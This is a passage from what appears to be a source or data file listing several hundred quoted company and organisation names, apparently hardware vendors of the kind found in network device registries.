"Mercury Systems – Trusted Mission Solutions, Inc.", + "Wanjiaan Interconnected Technology Co., Ltd", + "Tridonic GmbH & Co KG", + "ALE International", + "SOYO Technology Development Co., Ltd.", + "General Dynamics United Kingdom Ltd", + "GD Mission Systems", + "GTO Access Systems LLC", + "EosTek (Shenzhen) Co., Ltd.", + "AlphaTheta Corporation", + "Volta Networks", + "sTraffic", + "Logitech Europe SA", + "Quarion Technology Inc", + "Chengdu Xiyida Electronic Technology Co,.Ltd", + "Sunniwell Cyber Tech. Co., Ltd.", + "Southwest Research Institute", + "WOORI ELEC Co.,Ltd", + "Acutvista Innovation Co., Ltd.", + "Image Data Processing System Group", + "Dangaard Telecom Denmark A/S", + "Logiplus", + "Hong Kong Water World Technology Co. Limited", + "JianLing Technology CO., LTD", + "Plume Design Inc", + "OptoMET GmbH", + "Elbit Systems Ltd.", + "Synergics Technologies GmbH", + "DIAODIAO(Beijing)Technology CO.,Ltd", + "HAN Networks Co., Ltd", + "PLNetworks", + "Green Wave Telecommunication SDN BHD", + "Shenzhen Lencotion Technology Co.,Ltd", + "Techfaithwireless Communication Technology Limited.", + "QianGua Corp.", + "Raden Inc", + "Lyyn AB", + "Shenzhen H&T Intelligent Control Co.,Ltd.", + "JSC Concern Sozvezdie", + "CliniCare LTD", + "Reliance Communications LLC", + "Takaoka Toko Co.,Ltd.", + "SoundBridge", + "LEGIC Identsystems AG", + "Innolux Technology Europe BV", + "Naver", + "MiXTelematics", + "Mechatro, Inc.", + "Hermary Opto Electronics Inc.", + "Crystal Group, Inc.", + "Artisoft Inc.", + "16063", + "InVue", + "Herman Miller", + "Hoya Service Corporation", + "Huaqin Telecom Technology Co.,Ltd", + "Miovision Technologies Incorporated", + "Blue Calypso, Inc.", + "Zhongshan Scinan Internet of Things Co.,Ltd.", + "Dongguan Koppo Electronic Co.,Ltd", + "Meritech Co.,Ltd", + "Seoul Electronics&Telecom", + "Crouzet Automatismes", + "Global Fire Equipment S.A.", + "Baofeng TV Co., Ltd.", + "RackTop Systems Inc.", + "Rain Bird Corporation", + "ShenZhen Protruly Electronic Ltd co.", + "Logistic Service & Engineering Co.,Ltd", + "GOPEACE Inc.", + "Arria Live Media, Inc.", + "Acoustic Stream", + "Comstock RD, Inc.", + "Tesorion Nederland B.V.", + "Home Skinovations", + "Icarvisions (Shenzhen) Technology Co., Ltd.", + "JNC Systems, Inc.", + "Vivatel Company Limited", + "Tsuzuki Denki", + "Bragi GmbH", + "CNEX Labs", + "Roxton Systems Ltd.", + "Dongguan Sen DongLv Electronics Co.,Ltd", + "ZF TRW Automotive", + "Shenzhen Xin Fei Jia Electronic Co. Ltd.", + "Planet Bingo® — 3rd Rock Gaming®", + "Idt, Inc.", + "Queclink Wireless Solutions Co., Ltd", + "Cuff", + "Moduel AB", + "Whaley Technology Co.Ltd", + "Beijing Guang Runtong Technology Development Company co.,Ltd", + "IOTTECH Corp", + "Parallel Wireless, Inc", + "Liteon, Inc.", + "Shenzhen Urovo Technology Co.,Ltd.", + "Davit Solution co.", + "Tianjin Zanpu Technology Inc.", + "Galore Networks Pvt. Ltd.", + "CTEK Sweden AB", + "SAI Technology Inc.", + "Beijing Xiaoyuer Technology Co. Ltd.", + "G2C Co. Ltd.", + "Abeeway", + "Junilab, Inc.", + "Modcam AB", + "SHC Netzwerktechnik GmbH", + "Derek (Shaoguan) Limited", + "EpSpot AB", + "ShengHai Electronics (Shenzhen) Ltd", + "Wuhan Feng Tian Information Network CO.,LTD", + "Novi Security", + "BobjGear LLC", + "Nexxt Solutions", + "Rivet Networks", + "CIBN Oriental Network(Beijing) CO.,Ltd", + "DATTUS Inc", + "Vital Connect, Inc.", + "TangoWiFi.com", + "Henan Chengshi NetWork Technology Co.,Ltd", + "Aidon Oy", + "Shenzhen Boomtech Industry Co.,Ltd", + "Metrascale Inc.", + "Elite Optoelectronic(Asia)Co.,Ltd", + "ORICO Technologies Co., Ltd", + "Patrol Tag, Inc", + "SP Best Corporation Co., LTD.", + "Shenzhen Huapu Digital CO.,Ltd", + "RWE Effizienz GmbH", + "FATEK Automation Corporation", + "PT. Callysta Multi Engineering", + "fenglian Technology Co.,Ltd.", + "Shenzhen Primestone Network Technologies.Co., Ltd.", + "Bse Co.,Ltd.", + "L-Tech Corporation", + "Sino-Telecom Technology Co.,Ltd.", + "Boge Kompressoren OTTO Boge GmbH & Co. KG", + "Senor Tech Co Ltd", + "G-Wearables Corp.", + "Airwire Technologies", + "Beijing Yuecheng Technology Co. Ltd.", + "Cap-Tech International Co., Ltd.", + "Vexata Inc", + "Pramod Telecom Pvt. Ltd", + "Mooredoll Inc.", + "Bitdefender SRL", + "OMRON HEALTHCARE Co., Ltd.", + "Razer Inc", + "Costar Video Systems", + "Art Beijing Science and Technology Development Co., Ltd.", + "WigWag Inc.", + "Four systems Co.,Ltd.", + "Fairphone", + "DirectPacket Research, Inc,", + "ESA Elektroschaltanlagen Grimma GmbH", + "Fike Corporation", + "Alinket Electronic Technology Co., Ltd", + "Insensi", + "Guangzhou Yuanyun Network Technology Co.,Ltd", + "Discovery Insure", + "Liling FullRiver Electronics & Technology Ltd", + "Reacheng Communication Technology Co.,Ltd", + "Innova Security", + "Shenzhen Concox Information Technology Co., Ltd", + "Inlab Networks GmbH", + "WOO Sports", + "Shenzhen Fuzhi Software Technology Co.,Ltd", + "Winfirm Technology", + "ST Electronics(Shanghai) Co.,Ltd", + "VAIO Corporation", + "eta plus electronic gmbh", + "Satelco AG", + "Tunai Creative", + "Scalable Network Technologies Inc", + "Axacore", + "SKF GmbH", + "Presition (2000) Co., Ltd.", + "AirPro Technology India Pvt. Ltd", + "Atomos Engineering P/L", + "Airware", + "RailComm, LLC", + "Shenzhen Hangsheng Electronics Co.,Ltd.", + "Emizon Networks Limited", + "Shenzhen SDGI CATV Co., Ltd", + "ZOYI Company", + "ZhongMiao Technology Co., Ltd.", + "GatesAir, Inc", + "Yunnan Ideal Information&Technology.,Ltd", + "Kamo Technology Limited", + "Newings Communication CO., LTD.", + "Dediprog Technology Co. Ltd.", + "CloudGenix Inc", + "MMPC Inc.", + "Digicom Futuristic Technologies Ltd.", + "streamnow AG", + "SIS Sat Internet Services GmbH", + "gosund GROUP CO.,LTD", + "Devialet", + "Zhejiang Wellcom Technology Co.,Ltd.", + "GZ Weedong Networks Technology Co. , Ltd", + "Hella Sonnen- und Wetterschutztechnik GmbH", + "samtec automotive electronics & software GmbH", + "YIK Corporation", + "OPMEX Tech.", + "Hitachi-Lg Data Storage Inc", + "NECMagnusCommunications", + "Guangdong Appscomm Co.,Ltd", + "Eumtech Co., Ltd", + "PT.Navicom Indonesia", + "XonTel Technology Co.", + "Krauss Maffei Technologies GmbH", + "Jabil Circuits India Pvt Ltd,-EHTP unit", + "Zealabs srl", + "Measurement Systems S. de R.L.", + "Berkeley Nucleonics Corp", + "Ericsson-LG Enterprise", + "Arista Corp", + "Shenzhen Wisky Technology Co.,Ltd", + "Ahn Inc.", + "EQUES Technology Co., Limited", + "Labris Networks", + "IMBEL - Industria de Material Belico do Brasil", + "MIC Technology Group", + "Telegartner Karl Gartner GmbH", + "Noviga", + "Pep Digital Technology (Guangzhou) Co., Ltd", + "DellKing Industrial Co., Ltd", + "Trek Technology (S) Pte Ltd", + "Gmx Sas", + "bioMerieux Inc.", + "Fu Gang Electronic(KunShan)CO.,LTD", + "Philio Technology Corporation", + "Portalis LC", + "Micropoint Biotechnologies,Inc.", + "Broadlink Pty Ltd", + "Actineon", + "Shanghai Hongzhuo Information Technology co.,LTD", + "MasterImage 3D", + "Intellian Technologies, Inc.", + "Ivy Biomedical", + "Zhejiang Weirong Electronic Co., Ltd", + "Penguin Computing", + "New Singularity International Technical Development Co.,Ltd", + "HiTEM Engineering", + "Leitner SpA", + "Shenzhen sangfei consumer communications co.,ltd", + "Amptown System Company GmbH", + "Sanix Incorporated", + "ADATA Technology Co., Ltd", + "Kyland-USA", + "Warp9 Tech Design, Inc.", + "GME Standard Communications P/L", + "ShenYang ZhongKe-Allwin Technology Co.LTD", + "ITON Technology Limited", + "Pintsch GmbH", + "Maxway Electronics CO.,LTD", + "Krg Corporate", + "Iec – Tc9 Wg43", + "WirelessWERX, Inc", + "S.e.technologies Limited", + "AKELA, Inc.", + "TomTom Software Ltd", + "Thales Canada Inc.", + "Tamagawa Seiki Co.,Ltd.", + "Atomax Inc.", + "Nanjing Zhongke Menglian Information Technology Co.,LTD", + "University of Michigan", + "Comtech Technology Co., Ltd.", + "Beijing Winchannel Software Technology Co., Ltd", + "Yancheng Kecheng Optoelectronic Technology Co., Ltd", + "Seal One AG", + "Addat s.r.o.", + "Siemens Energy Automation", + "Ablelink Electronics Ltd", + "TELNET Redes Inteligentes S.A.", + "Bestcare Cloucal Corp.", + "Grand Electronics (HK) Ltd", + "daesung network", + "The Electric Controller and Manufacturing Co., LLC", + "VILLBAU Ltd.", + "aFUN TECHNOLOGY INC.", + "Ooo Ttv", + "Alphion India Private Limited", + "SOLEM Electronique", + "The Will-Burt Company", + "Wincal Technology Corp.", + "Proton Products Chengdu Ltd", + "DualShine Technology(SZ)Co.,Ltd", + "Pertronic Industries", + "Tpl Systemes", + "shenzhen kaism technology Co. Ltd", + "shenzhen eyunmei technology co,.ltd", + "ACTP, Inc.", + "Adonit Corp. Ltd.", + "Plexus Manufacturing Sdn Bhd", + "Shanghai GMT Digital Technologies Co., Ltd", + "NSC Communications Siberia Ltd", + "Beijing Haier IC Design Co.,Ltd", + "Paradigm Electronics Inc", + "Zhejiang shenghui lighting co.,Ltd", + "Shenzhen Bolutek Technology Co.,Ltd.", + "Novatek Microelectronics Corp.", + "Iffu", + "Gemalto M2M GmbH", + "Discovery Technology,LTD..", + "JiangSu NanJing University Electronic Information Technology Co.,Ltd", + "Huike Electronics (SHENZHEN) CO., LTD.", + "VeloCloud Networks", + "Woojeon&Handan", + "7Inova Technology Limited", + "Nanoptix Inc.", + "Shenzhen Communication Technology Co.,Ltd", + "TMRG, Inc.", + "Tosibox Oy", + "Incipio Technologies, Inc", + "Denkovi Assembly Electronics LTD", + "M-Cube Spa", + "Gebr. Bode GmbH & Co KG", + "ShenZhen ANYK Technology Co.,LTD", + "ZeroDesktop, Inc.", + "Dalian Co-Edifice Video Technology Co., Ltd", + "Yota Devices OY", + "Steinsvik", + "CELOXICA Ltd", + "Montage Technology Group Limited", + "Bluwan SA", + "Inventek Systems", + "Sunwave Communications Co., Ltd", + "Shenzhen Bopengfa Elec&Technology CO.,Ltd", + "GBO Technology", + "Poindus Systems Corp.", + "Advanced Automotive Antennas", + "Solid Semecs bv.", + "Shanghai Pateo Electronic Equipment Manufacturing Co., Ltd.", + "Bestek Corp.", + "Apator S.a.", + "Stonesoft Corporation", + "OPUS High Technology Corporation", + "iNFORM Systems AG", + "Creatcomm Technology Inc.", + "Swissphone Telecom AG", + "Hongkong Yunlink Technology Limited", + "Hanvit SI, Inc.", + "BEGA Gantenbrink-Leuchten KG", + "A.N. Solutions GmbH", + "Hongyu Communication Technology Limited", + "Total Aviation Solutions Pty Ltd", + "Car Connectivity Consortium", + "Navielektro Ky", + "GEA Farm Technologies GmbH", + "ZyCast Technology Inc.", + "Strata Worldwide", + "Steinel GmbH", + "Shenzhen Clou Electronics Co. Ltd.", + "Perma-Pipe, Inc.", + "Heinzmann GmbH & CO. KG", + "Nanjing CAS-ZDC IOT SYSTEM CO.,LTD", + "Filizola S.a. Pesagem E Automacao", + "C.R.S. iiMotion GmbH", + "Eno Inc.", + "Skiva Technologies, Inc.", + "Automatic Systems", + "AirCUVE Inc.", + "Swarco LEA d.o.o.", + "Datafox GmbH", + "Promzakaz Ltd.", + "Monaco Enterprises, Inc.", + "Beijing Hanbang Technology Corp.", + "Orga BV", + "Sourcefire, Inc", + "Boxx TV Ltd", + "SBG Systems SAS", + "HuiZhou KaiYue Electronic Co.,Ltd", + "Moduletek", + "Lifi Labs Management Pty Ltd", + "Blu Castle S.a.", + "Maestronic", + "Pandora Mobility Corporation", + "Zimory GmbH", + "Shanghai Chint Power Systems Co., Ltd.", + "Helmholz GmbH & Co. KG", + "Enervalley Co., Ltd", + "Eutronix Co., Ltd.", + "Asia Optical Co., Inc.", + "Avanu", + "Low Tech Solutions", + "Shenzhen Dynamax Software Development Co.,Ltd.", + "Loxone Electronics GmbH", + "ATH system", + "Samsung Semiconductor Inc.", + "Asoni Communication Co., Ltd.", + "Telenet Systems P. Ltd.", + "Dedicated Network Partners Oy", + "Gimbal, Inc", + "SankyuElectronics", + "Foresight Manufacture (S) Pte Ltd", + "Fitview", + "Peerless AV", + "Advantage Electronics", + "IoT Tech Limited", + "AVAT Automation GmbH", + "Acumen", + "Millennium Group, Inc.", + "Ubizcore Co.,LTD", + "Patrol Products Consortium LLC", + "Ouya, Inc", + "Beijing Novel Super Digital TV Technology Co., Ltd", + "Kivic Inc.", + "Bay Storage Technology", + "Dairy Cheq Inc", + "TaiYear Electronic Technology (Suzhou) Co., Ltd", + "LLC Emzior", + "Junger Audio-Studiotechnik GmbH", + "BBMC Co.,Ltd", + "Out of the Fog Research LLC", + "Netstor Technology Co., Ltd.", + "Flat Display Technology Corporation", + "Genie Networks Limited", + "OOSIC Technology CO.,Ltd", + "Wintop", + "BW Broadcast", + "Comigo Ltd.", + "Assa", + "Esson Technology Inc.", + "Eden Innovations", + "Shenzhen Haitianxiong Electronic Co., Ltd.", + "Bürkert Werke GmbH", + "Taiwan Carol Electronics., Ltd", + "Conti Temic Microelectronic GmbH", + "Changzhou Tiannengbo System Co. Ltd.", + "Countwise LTD", + "KangSheng LTD.", + "Bytemark Computer Consulting Ltd", + "Baycity Technologies Ltd", + "Valentine Research, Inc.", + "Ksp Inc.", + "Nilan A/S", + "Handaer Communication Technology (Beijing) Co., Ltd", + "Atmaca Elektronik", + "2GIG Technologies", + "Vicos", + "Net2grid Bv", + "ABB Australia", + "Beijing Huasun Unicreate Technology Co., Ltd", + "UCZOON Technology Co., LTD", + "My Social Stuff", + "Comprehensive Power", + "Lexking Technology Co., Ltd.", + "SK Mtek microelectronics(shenzhen)limited", + "ATCOM Technology Co.Ltd.", + "enblink", + "ComAp s.r.o.", + "Fanhattan LLC", + "I'm Spa", + "Intellimedia Systems Ltd", + "W-IE-NE-R Plein & Baus GmbH", + "Nortec", + "Smartrove Inc", + "VPI Engineering", + "New Cosmos Electric Co., Ltd.", + "Applied Technical Systems", + "Garea Microsys Co.,Ltd.", + "INSTAR Deutschland GmbH", + "Alpheus Digital Company Limited", + "Albedo Telecom SL", + "Inala Technologies", + "Jaguar de Mexico, SA de CV", + "+plugg srl", + "Dinstar Technologies Co., Ltd.", + "Mueller Systems", + "Commsen Co., Limited", + "Upwis Ab", + "Shenzhen Trimax Technology Co.,Ltd", + "Rowley Associates Limited", + "Fusion Transactive Ltd.", + "Mcst Zao", + "Radinet Communications Inc.", + "Godrej & Boyce Mfg. co. ltd", + "Effigis GeoSolutions", + "Liptel s.r.o.", + "Honeywell Fire System (Shanghai) Co,. Ltd.", + "Innovative Security Designs", + "BitWise Controls", + "Cumulus Networks, inc", + "Shandong Taixin Electronic co.,Ltd", + "Nse Ag", + "Ingate Systems", + "Basler Electric Company", + "Soladigm, Inc.", + "JIAXING GLEAD Electronics Co.,Ltd", + "Key Digital Systems", + "Shanghai Kingto Information Technology Ltd", + "ProSys Development Services", + "Rajant Corporation", + "Office FA.com Co.,Ltd.", + "Conti Temic microelectronic GmbH", + "Envision Peripherals Inc", + "Skspruce Technologies", + "Ecil Informatica Ind. Com. Ltda", + "LAN Accessories Co., Ltd.", + "SuperVision", + "Shenzhen CZTIC Electronic Technology Co., Ltd", + "Kuang-chi Institute of Advanced Technology", + "X6D Limited", + "PRICOM Design", + "Stewart Audio", + "Harley-Davidson Motor Company", + "TransPacket AS", + "Uriel Technologies SIA", + "Deutron Electronics Corp.", + "Weinmann Geräte für Medizin GmbH + Co. KG", + "Amscreen Group Ltd", + "Steffes Corporation", + "Verathon", + "Linear Llc", + "Ketron S.r.l.", + "Bosch Software Innovations GmbH", + "S.a. Sistel", + "Fujitsu Technology Solutions GmbH", + "Fiber Optic & telecommunication INC.", + "DVR C&C Co., Ltd.", + "Intermas France", + "Mxt Industrial Ltda", + "NAVIS Inc.", + "Building Block Video", + "Uptmate Technology Co., LTD", + "CityCom GmbH", + "Inmarsat", + "Tokheim", + "Wren Sound Systems, LLC", + "Becker Electronics Taiwan Ltd.", + "LSY Defense, LLC.", + "Vitek Industrial Video Products, Inc.", + "ConnectQuest, llc", + "BLANKOM Antennentechnik GmbH", + "Fon Technology S.L.", + "Instorescreen Aisa", + "GE Energy", + "Cybelec Sa", + "Furukawa Industrial S.A. Produtos Elétricos", + "Convergence Technologies", + "UniPrint", + "Detlef Fink Elektronik & Softwareentwicklung", + "Wireless Tsukamoto.,co.LTD", + "VTS GmbH", + "Beijing WisVideo INC.", + "mLogic LLC", + "Fujian Netcom Technology Co., LTD", + "Xena Networks", + "Shenzhen Aero-Startech. Co.Ltd", + "Sankosha Corporation", + "Power Quotient International Co., Ltd.", + "Techaya LTD", + "Capelec", + "DBL Technology Ltd.", + "Abb Spa, Abb Sace Div.", + "Telewave Co., Ltd.", + "Advanced Photonics, Inc.", + "Dynapower Company LLC", + "BetterBots", + "Damalisk", + "Schneider Electric Canada Inc", + "Ubiquitous Computing Technology Corporation", + "Zonoff", + "Cloos Electronic Gmbh", + "Pfeiffer Vacuum GmbH", + "Everex Electronics Limited", + "Ericsson - North America", + "Petroleum Geo-Services", + "SAEHAN HITEC Co., Ltd", + "Shenzhen Jiaxinjie Electron Co.,Ltd", + "Gen2wave", + "Phorus", + "Diehl BGT Defence GmbH & Co. KG", + "Jiangxi Shanshui Optoelectronic Technology Co.,Ltd", + "PYRAMID Computer GmbH", + "Audivo GmbH", + "BIOSTAR Microtech Int'l Corp.", + "Zennio Avance Y Tecnologia, S.l.", + "Shany Electronic Co., Ltd.", + "Audyssey Laboratories Inc.", + "Dali Wireless, Inc.", + "Obelux Oy", + "UTT Co., Ltd.", + "Bookeen", + "South African Broadcasting Corporation", + "TJK Tietolaite Oy", + "ENGICAM s.r.l.", + "Avery Weigh-Tronix, LLC", + "Intelligent Technology Inc.", + "Freestyle Energy Ltd", + "Rsf", + "Buwon Technology", + "Blue Wave Networking Co Ltd", + "MEG Electronics Inc.", + "Plexxi, Inc.", + "Foxda Technology Industrial(ShenZhen)Co.,LTD", + "JDA, LLC (JDA Systems)", + "GJsun Optical Science and Tech Co.,Ltd.", + "U Tek Company Limited", + "Deny Fontaine", + "Cox Co., Ltd", + "Valueplus Inc.", + "Accensus LLC", + "ABIsystems Co., LTD", + "Jsw Pacific Corporation", + "Sirius XM Radio Inc", + "Zektor", + "Serialway Communication Technology Co. Ltd", + "OpenXS BV", + "SYNTEC Incorporation", + "Shenzhen Smarteye Digital Electronics Co., Ltd", + "Omntec mfg. inc", + "ShenZhen EZL Technology Co., Ltd", + "SKTB SKiT", + "M Rutty Holdings Pty. Ltd.", + "International Communications Corporation", + "8D Technologies", + "KOSTAL Industrie Elektrik GmbH", + "Elefirst Science & Tech Co ., ltd", + "Anite Telecoms US. Inc", + "Shenzhen Super Rich Electronics Co.,Ltd", + "iKnowledge Integration Corp.", + "Alstom Hydro France", + "CEIVA Logic, Inc", + "American Magnetics, Inc.", + "AmTRAN Video Corporation", + "GuangDong Quick Network Computer CO.,LTD", + "Tenyu Tech Co. Ltd.", + "Shenzhen Lifesense Medical Electronics Co., Ltd.", + "Delphian Systems LLC", + "Wuxi Zhongxing Optoelectronics Technology Co.,Ltd.", + "BND Co., Ltd.", + "Meinberg Funkuhren GmbH & Co. KG", + "Fermax Electronica S.a.u.", + "I-Bt Digital Co.,Ltd", + "2276427 Ontario Inc", + "Thought Creator", + "KBC Networks", + "Infinidat Ltd.", + "Seneca s.r.l.", + "EVRsafe Technologies", + "Innovative Converged Devices Inc", + "Foxconn(NanJing) Communication Co.,Ltd.", + "Avermetrics", + "Ningbo FreeWings Technologies Co.,Ltd", + "Cmc", + "Johnson Outdoors Marine Electronics d/b/a Minnkota", + "Lightning Telecommunications Technology Co. Ltd", + "Nebusens, S.L.", + "NUUO Inc.", + "Norphonic AS", + "Insigma Technology Co.,Ltd", + "Fraunhofer ITWM", + "ROGER D.Wensker, G.Wensker sp.j.", + "Genelec", + "SMAX Technology Co., Ltd.", + "ABUS Security-Center GmbH & Co. KG", + "Khomp", + "Sol Industry Pte., Ltd", + "Mcd Electronics Sp. Z O.o.", + "Miller Electric Mfg. Co.", + "Rramac", + "Hitachi Data Systems", + "Emtronix", + "Trei technics", + "Joyent, Inc.", + "Lantis co., LTD.", + "Delta Control GmbH", + "Keith & Koep GmbH", + "Invoxia", + "Lumewave", + "BSMediasoft Co., Ltd.", + "Powertech Industrial Co., Ltd.", + "Shanghai BroadMobi Communication Technology Co., Ltd.", + "Longdhua(Beijing) Controls Technology Co.,Ltd", + "Linkwell Telesystems Pvt Ltd", + "beroNet GmbH", + "Elesys Inc.", + "EasyIO Corporation Sdn. Bhd.", + "Enelps", + "INQ Mobile Limited", + "Frontline Test Equipment", + "ViVOtech, Inc.", + "Telldus Technologies AB", + "Scs Sa", + "Siliconware Precision Industries Co., Ltd.", + "Pixsys Srl", + "NextBIT Computing Pvt. Ltd.", + "Fortune Techgroup Co.,Ltd", + "Alphatron Marine BV", + "MESADA Technology Co.,Ltd.", + "Bosch Building Automation GmbH", + "D. ORtiz Consulting, LLC", + "Ayecka Communication Systems LTD", + "Ea Display Limited", + "Microseven Systems, LLC", + "feno GmbH", + "Delta Mobile Systems, Inc.", + "WAXESS USA Inc", + "Netlogic AB", + "Beijing Railway Signal Factory", + "GHT Co., Ltd.", + "Conductix-Wampfler GmbH", + "Hubbell Building Automation, Inc.", + "Shenzhen JoinCyber Telecom Equipment Ltd", + "Fusion-io, Inc", + "Lantech Communications Global, Inc.", + "Qi Hardware Inc.", + "Lufft Mess- und Regeltechnik GmbH", + "Stonestreet One LLC", + "Harman Consumer Group", + "ITS Telecom", + "Teraworks Co., Ltd.", + "Riz Transmitters", + "data-complex GmbH", + "Dags", + "Conet Co., Ltd.", + "RAFI GmbH & Co.KG", + "Westinghouse Digital", + "Shenzhen Jinhengjia Electronic Co., Ltd.", + "Weibel Scientific A/S", + "Ttk Sas", + "Gigawave LTD", + "BenQ Corporation", + "Aligera Equipamentos Digitais Ltda", + "Nuvico", + "Asp Ag", + "RED Digital Cinema", + "System In Frontier Inc.", + "NxtConect", + "Cydle Corp.", + "Miljovakt AS", + "TrafficCast International", + "NovelSat", + "Gravotech Marking Sas", + "Trymus", + "Ettus Research LLC", + "RM Tech Co., Ltd.", + "V2 Technology, Inc.", + "Hanscan Spain S.A.", + "Biometric Associates, LP", + "Shanghai Typrotech Technology Co.Ltd", + "Special Instrument Development Co., Ltd.", + "Tianjin Deviser Electronics Instrument Co., Ltd", + "Sapphire Technology Limited.", + "Shenzhen Reach software technology CO.,LTD", + "V Technology Co., Ltd.", + "Park Assist LLC", + "inMotion Ltd.", + "HongKong THTF Co., Ltd", + "Simton Technologies, Ltd.", + "Busware.de", + "Lyngso Marine A/S", + "GkWare e.K.", + "Embed, Inc", + "Angstrem Telecom", + "PiiGAB, Processinformation i Goteborg AB", + "Amplified Engineering Pty Ltd", + "GE Medical System(China) Co., Ltd.", + "GST Co., Ltd.", + "IDY Corporation", + "Guangzhou Hkust Fok Ying Tung Research Institute", + "BioControl AS", + "LevelOne Communications (India) Private Limited", + "Ryowa Electronics Co.,Ltd", + "Sonardyne International Ltd", + "Obihai Technology, Inc.", + "APCON, Inc.", + "Beautiful Enterprise Co., Ltd", + "Guangzhou CHNAVS Digital Technology Co.,Ltd", + "Bg T&A", + "Nolangroup S.P.A con Socio Unico", + "Beijing Boomsense Technology CO.,LTD.", + "Scheidt & Bachmann GmbH", + "SHL Telemedicine International Ltd.", + "Hangzhou Zenointel Technology Co., Ltd", + "ITF Fröschl GmbH", + "Patlite Corporation", + "Theben AG", + "iNES. applied informatics GmbH", + "Raylios Technology", + "Compacta International, Ltd.", + "Black Box Corp.", + "Nanjing Nengrui Auto Equipment CO.,Ltd", + "Xirka Dama Persada PT", + "Trison Technology Corporation", + "Endian s.r.l.", + "Sagittar Limited", + "I-sys Corp", + "Dowslake Microsystems", + "Shanghai XiMei Electronic Technology Co. Ltd", + "Drägerwerk AG & Co. KG aA", + "Innovid, Co., Ltd.", + "Gyeyoung I&T", + "Adaxys Solutions AG", + "Messana Air.Ray Conditioning s.r.l.", + "Riedo Networks Ltd", + "YAMABISHI Corporation", + "P.T.I Co.,LTD", + "Best Wish Technology LTD", + "ecobee inc", + "Tri-Sen Systems Corporation", + "Sogecam Industrial, S.A.", + "Amphenol", + "S5 Tech S.r.l.", + "Volex Inc.", + "Volans", + "ZTEC Instruments, Inc.", + "Cmr Korea Co., Ltd", + "Mikrovisatos Servisas UAB", + "IEEE 1722a Working Group", + "Deltenna Ltd", + "Torrey Pines Logic, Inc", + "TE Connectivity Limerick", + "Dongguan Qisheng Electronics Industrial Co., Ltd", + "Silicon Valley Global Marketing", + "Pico Technology", + "Neosystem Co. Ltd.", + "Woodstream Corporation", + "MEDISON Xray Co., Ltd", + "Barberry Solutions Ltd", + "Cognitas Technologies, Inc.", + "Galtronics Telemetry Inc.", + "Maestro Wireless Solutions ltd.", + "Weightech Com. Imp. Exp. Equip. Pesagem Ltda", + "nSTREAMS Technologies, Inc.", + "Remec Broadband Wireless , LLC", + "Biodata Ltd", + "Wuhan Huagong Genuine Optics Technology Co., Ltd", + "Rafael Ltd.", + "TTC Next-generation Home Network System WG", + "Heimann Sensor GmbH", + "UAB Selteka", + "Trilobit Ltda.", + "Cohda Wireless Pty Ltd", + "WEY Technology AG", + "NBS Payment Solutions Inc.", + "Friem Spa", + "Phoenix Broadband Technologies, LLC.", + "Mpi Tech", + "Talari Networks", + "GET Engineering", + "Indra Espacio S.a.", + "JANOME Corporation", + "Bravo Tech, Inc.", + "Hangzhou LEAD-IT Information & Technology Co.,Ltd", + "Store Electronic Systems", + "Samwin Hong Kong Limited", + "Adatis GmbH & Co. KG", + "Infratec Datentechnik GmbH", + "Qfiednet Co., Ltd.", + "OpenPattern", + "There Corporation Oy", + "Infinity System S.L.", + "UltraClenz, LLC", + "Taleo", + "Active Control Technology Inc.", + "Twinlinx Corporation", + "ATOCS (Shenzhen) LTD", + "Gheo Sa", + "Anadem Information Inc.", + "Universal Audio, Inc", + "Beijing Gefei Tech. Co., Ltd", + "Looxcie Inc.", + "Bolymin, Inc.", + "b gmbh medien + datenbanken", + "Ieee Pes Psrc/Sub", + "Shenzhen Unistar Communication Co.,LTD", + "Wellav Technologies Ltd", + "Dlx", + "Poslab Technology Co., Ltd.", + "Phase Motion Control SpA", + "Ascon Ltd.", + "Elber Srl", + "Samtec Inc", + "d2d technologies", + "Directed Perception, Inc", + "Microtime Computer Inc.", + "Enecsys Ltd", + "Tenebraex", + "Wireless Standard Extensions", + "EKE Building Technology Systems Ltd", + "Global Traffic Technologies, LLC", + "Openpeak, Inc", + "Best Buy Corporation", + "Jadak Llc", + "Shanghai B-Star Technology Co", + "Coresys", + "Thermo Fisher Scientific S.p.a.", + "Guang Zhou TRI-SUN Electronics Technology Co., Ltd", + "Parsec (Pty) Ltd", + "Plastic Logic", + "Changhe Electronics Co., Ltd.", + "V.D.S. Video Display Systems srl", + "DCONWORKS Co., Ltd", + "Reco S.p.A.", + "NTT Communications Corporation", + "Paragon Technologies Inc.", + "Electron India", + "Honghao Mingchuan Technology (Beijing) CO.,Ltd.", + "Axium Technologies, Inc.", + "Dominion Voting Systems Corporation", + "Daruma Telecomunicações e Informática S.A.", + "NEC Personal Products, Ltd", + "Evrisko Systems", + "Mediline Italia Srl", + "X2gen Digital Corp. Ltd", + "Arnold&Richter Cine Technik GmbH & Co. Betriebs KG", + "A. S. Thomas, Inc.", + "LNT-Automation GmbH", + "AUG Elektronik GmbH", + "UniComm Inc.", + "Beckman Coulter K.K.", + "SmartDrive Systems Inc.", + "AnaCom Inc", + "SUHDOL E&C Co.Ltd.", + "H&D Wireless", + "Net Optics", + "Win Leader Inc.", + "Valuable Techologies Limited", + "Tenda Technology Co., Ltd.", + "Otus Technologies Ltd", + "Leica Microsystems (Schweiz) AG", + "DLG Automação Industrial Ltda", + "Spawn Labs, Inc", + "Greenwald Industries", + "Cvc", + "Shenzhen Baoan Fenda Industrial Co., Ltd", + "Digital One Technologies, Limited", + "Cashmaster International Limited", + "AXERRA Networks Ltd", + "Advas Co., Ltd.", + "Nuvon, Inc", + "Geenovo Technology Ltd.", + "Grainmustards, Co,ltd.", + "Rebound Telecom. Co., Ltd", + "Envisionnovation Inc", + "Iee S.a.", + "PNC Technologies Co., Ltd.", + "2N TELEKOMUNIKACE a.s.", + "INCOstartec GmbH", + "AirDio Wireless, Inc.", + "XRPLUS Inc.", + "Golden Highway Industry Development Co., Ltd.", + "TaiDoc Technology Corp.", + "Magic Point Inc.", + "Ningbo Andy Optoelectronic Co., Ltd.", + "Instrumentation Technology Systems", + "Nesslab", + "TKM GmbH", + "Technology Advancement Group, Inc.", + "Visionhitech Co., Ltd.", + "Setrix GmbH", + "Duelco A/S", + "Thales Communications Inc", + "S Squared Innovations Inc.", + "Zeno Information System", + "CellTel S.p.A.", + "companytec automação e controle ltda.", + "SAE Magnetics (H.K.) Ltd.", + "Qingbang Elec(Sz) Co., Ltd", + "Frc", + "Baustem Broadband Technologies, Ltd.", + "MIR - Medical International Research", + "Essensium Nv", + "Shine Union Enterprise Limited", + "Carecom Co.,Ltd.", + "Pilot Electronics Corporation", + "J&M Analytik AG", + "Wfe Technology Corp.", + "DaySequerra Corporation", + "Acorel S.a.s", + "Proxense, 